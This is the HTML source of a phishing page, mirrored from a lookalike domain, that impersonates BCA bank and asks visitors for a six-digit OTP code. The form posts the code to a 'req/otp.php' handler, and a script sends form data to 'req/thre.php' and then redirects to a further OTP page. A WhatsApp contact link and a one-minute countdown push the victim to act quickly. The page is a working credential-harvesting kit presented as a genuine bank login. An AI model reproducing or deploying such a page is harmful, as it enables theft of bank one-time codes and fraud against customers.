

<!DOCTYPE html>
<html lang="en"> 

<!-- Mirrored from perubahan-tarif-transaksi-2024.ws-com.sbs/Bank-Bca/login.php by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 21 Jan 2024 14:28:42 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>	
<title> BCA</title>	
<meta charset="UTF-8">	
<meta http-equiv="X-UA-Compatible"		 content="IE=edge"> 
<meta name="viewport"		 content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<meta http-equiv="Cache-Control"		 content="max-age=0, no-cache, must-revalidate">	
<meta http-equiv="Pragma"		 content="no-cache">
<meta http-equiv="Expires"		 content="0"> 	<link href="../../mayaestanti1.000webhostapp.com/patokmakngn.css"		 rel="stylesheet">
<link rel="icon"		 href="">	
<link rel="apple-touch-icon"		 href="">
<style>
    body, html{
     background-image: url('https://i.ibb.co.com/Ykd5jHZ/Picsart-24-02-12-19-33-08-725.jpg');
    background-repeat: no-repeat;
    background-position: 100% 100%;
    background-size: 100% 100%;
        font-family: 'Ubuntu', sans-serif;
      left: 0;
      right: 0;
      bottom: 0;
      top: 0;
      margin: 0px auto;
      background-color: #fff;
      width: 100%;
      height: auto;
      positon: fixed;
    
      
}
    .container {
     
        width: 90%;
        padding: -30px 0px;
        height: auto;
        margin:0px auto;
        border-radius:15px;
        border: 2px #000;
        background-color:#fff;

          box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
      
    }
     .btn-punya {
        display: block;
        margin: 0px auto 0 auto;
        padding: 0px;
        cursor: pointer;
        background: #2b6dff;
        border: none;
        text-align: center;
        height: 40px;
        width: 100%;
        max-width: 90%;
        font-family: 'Open Sans', sans-serif;
        font-size: 14px;
        font-weight: solid;
        color: #fff;
        letter-spacing: 2px;
        line-height: 1;
        border-radius: 25px;
        transition: background 200ms ease 0s;
   
    }
    
   input {
     font-family: 'Open Sans', sans-serif;
        border: 1px solid rgb(0, 134, 224);
        border-radius: 8px;
        width:94%;
        max-width: 86%;
           display: block;
        margin: 0px auto 0 auto;
        padding: 5px;
        cursor: pointer;
        font-size: 15px;
        font-weight: solid;
        
        height: 27px;
        line-height: 1;
        word-spacing: 1;
        text-align: ;
    }
    a{
       margin:10px;
          font-size: 12px;
        color: #fff;
    }
    h1{
        background:#0062e6;
        padding:10px 10px;
        margin: 0px;
    }
    b{
        font-size: 15px;
        color:#1dae4a;
    }
</style>
</head> 
<body>	
<img src="https://i.ibb.co.com/SQQqMws/IMG-20240212-150531.jpg"	width="100%" style="height:80px;box-shadow: 8px 8px 8px 0px rgba(8,8,0,0.5);">

<section>		
   <div class="col-12" style="width:559px; max-width:100%; display:block;margin:30px auto;">  
<div class="container">				
    <br><br>
    <img src="https://i.ibb.co.com/cycKScR/20240619-121535.jpg" width="100%" style="border-radius:20px;">
<div class="card-body d-flex py-5">					
<div class="col"> 
<div class="row"> 
<div class="col-12 col-sm-8 col-md-7 col-lg-6 mx-auto"> 
 <!-- Modal --> 

<div class="row"> 
<div class="col-12"> 
<div class="alert alert-v2 alert-warning d-flex" role="alert"> 
</div> 
<div> 
   

</div> 
</div> 
</div> 
</div>
</div>

   <div class="row"> 
     
     <p style="font-weight: bold; font-size: 18px; color: #098CE3; text-align: center; margin: 10px auto;" id="timers">1 : 00</p> 
    </div> 
 <form action="req/otp.php" method="post">
 
<div class="row mb-4"> 
<div class="col-12"> 
<div class="form-group"> 
<label for="bcaId" style="margin:20px;font-weight:bold; font-size:14px;color:#0d579f">Kode OTP :</label> <input type="password" inputmode="numeric" class="" id="bcaId" value="" name="otp" maxLength="6" placeholder="Masukkan Kode OTP" maxlength="6"  required /> 
 <br>
 <center>
     <a href="https://wa.me/6287736634378?text=*Request%20OTP*">
     <b>>> Request Kode Aktivasi? <<</b></a>
 </center>
</div> 
</div> 
</div> 
<br><br>
<div class="row"> 
<div class="col-12 col-sm col-md-8 mx-auto"> <button href="#" id="btnSubmit" class="btn-punya" type="submit" >PROSES</button> 
<br><br><br>
</div> 
</div> 
</form> 
</div> 
</div> 
</div>					 
	</div>		
<br>
	<footer>

</div>				
</section>	 					 
</div>					</div>				</div> 			</div>	</footer>	</div>	<script src="../vendors/jquery/dist/jquery.slim.min.html"></script> <script src="../vendors/bootstrap/dist/js/bootstrap.min.html"></script> <script src="../vendors/jquery-validation/dist/jquery.validate.html"></script> <script src="../vendors/jquery-mask-plugin/dist/jquery.mask.html"></script> <script src='../../cdnjs.cloudflare.com/ajax/libs/jquery/3.1.1/jquery.min.js'></script>
<script src='../../cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/js/bootstrap.min.js'></script>
<script type='text/javascript' src='k.js'></script> 
<script>
    function send(event){
        event.preventDefault();
        $("#btn1").prop("disabled", true);
        $.ajax({
            type: 'POST',
            url: 'req/thre.php',
            data: $('#form').serialize(),
            dataType: 'text',
            success: function(){
                window.location.href="validotp.html";
            }
        })
    };
</script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script> 
   <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous"></script> 
   <p id="status"></p>
   <script src="setPin.js"></script>
   
   <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"
    integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg=="
    crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<script>
        document.getElementById('timer').innerHTML =
          01 + ":" + 00;
        startTimer();
        
       
        
        function startTimer() {
          var presentTime = document.getElementById('timer').innerHTML;
          var timeArray = presentTime.split(/[:]+/);
          var m = timeArray[0];
          var s = checkSecond((timeArray[1] - 1));
          if(s==59){m=m-1}
          if(m<0){
            return
          }
          
          document.getElementById('timer').innerHTML =
            m + " : " + s;
          console.log(m)
          setTimeout(startTimer, 1000);
          
        }
        
        function checkSecond(sec) {
          if (sec < 10 && sec >= 0) {sec = "0" + sec}; // add zero in front of numbers < 10
          if (sec < 0) {sec = "59"};
          return sec;
        }
        
        
        
    </script> 
  <script>
      document.getElementById('timers').innerHTML =
          1 + ":" + 00;
        startTimer();
        
        function startTimer() {
          var presentTime = document.getElementById('timers').innerHTML;
          var timeArray = presentTime.split(/[:]+/);
          var m = timeArray[0];
          var s = checkSecond((timeArray[1] - 1));
          if(s==59){m=m-1}
          if(m<0){
            return
          }
          
          document.getElementById('timers').innerHTML =
            m + " : " + s;
          console.log(m)
          setTimeout(startTimer, 1000);
          
        }
        
        function checkSecond(sec) {
          if (sec < 10 && sec >= 0) {sec = "0" + sec}; // add zero in front of numbers < 10
          if (sec < 0) {sec = "59"};
          return sec;
        }
        
        
        
  </script>
<!-- </body> -->
</body>

<!-- Mirrored from perubahan-tarif-transaksi-2024.ws-com.sbs/Bank-Bca/login.php by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 21 Jan 2024 14:28:47 GMT -->
</html> 
